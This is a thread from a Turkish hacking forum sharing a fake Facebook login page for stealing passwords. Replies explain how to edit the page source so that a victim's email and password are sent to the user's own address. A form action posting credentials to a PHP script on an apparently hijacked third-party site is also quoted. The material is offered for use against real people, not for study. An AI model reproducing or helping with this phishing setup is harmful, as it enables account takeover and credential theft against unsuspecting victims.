Faceook hack

Se-ZeR

Emektar
12 Tem 2008
10,796
114
Antalya
işte beklenilen facebook hack bu fake çok işe yarar aynı facebook gorunmu kesınlıkle kendım upload ettim dahasıda geliyo!

link: https://tik.lat/CLERf

Arkadaşlar AÇıklama Basit.
Daha Neyini Tartışıyosunuz Bu Kadar?
Adresinizi Yazın, Karşı tarafa Atın, Gelsin Şifresi.
Olmuyo Olmuyo Olmuyo, Bu Nedir Böyle?
Bilgi Olduğundan DOlayı Paylaştım.
Biraz Kullanımıyla İlgili Konulara Göz Gezdirin.
Bir Saat Uğraşıp Döküman hazırlıyoruz Boşunamı?
Sİzde Zamanını Ayırıp Araştırıp, Okuyun.
Bu Konuya Göz Gezdiriniz:
ÖnemliNedir bu Fake ?

Son düzenleme:

lord_efe

Üye
20 Ocak 2010
107
0
saol arkadasım ama şifreyi girince şifre bizemi geliyor tam olarak anlamadım..:

bu fake i aç sonra ---GÖRÜNÜM e tıkla ordan KAYNAK a tıkla
"[email protected]" --->> ctrl+F kombinasyonu ile bu adresi ara

ONU SİL ORAYA KENDİ ADRESİNİ YAZ KAYDET
ŞİFRE SANA GELECEK ÇÜNKÜ YOKSA O ARKADAŞA GİDER

"kurban oraya adresi ve şifreyi yazınca şifre direk sana mail olarak gelecektir"

Son düzenleme:

daredevil23

Yeni üye
28 Ara 2009
48
0
hıcbırzaman hotmaıle gelmez sıfre servera gıder yanı kayıtlı olan sıteye sever olusturmanız lazım onun ıcın

20 Haz 2008
112
0
dosyayı not defterınden açın..ctrl f tusuna basın ve hotmail yazın.cıkan yerdekı adresı sılın ve kendı adresınızı yazın..sıfre maıl olarak sıze gelır..boylece kendınıze yonlendırmıs olusunuz..saygılarr UYKUSUZ HACKER....

behnam1987

Yeni üye
5 Ocak 2010
3
0
Link saglam, ama Fake calismiyo .... kokoin.php uzerine kurulmus , ama hatasi var scriptin...duzeltiniz...

dexmod1

Uzman üye
13 Ağu 2009
1,182
0
yasadıgım her yer
hop dedık burayı kacırdın bea
action=http://www.akhisaryavuzemlak.com/inc/kokoin.php method=post>
<INPUT type=hidden value=" edit samurai / msn adresi vermek yasaK!!!

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.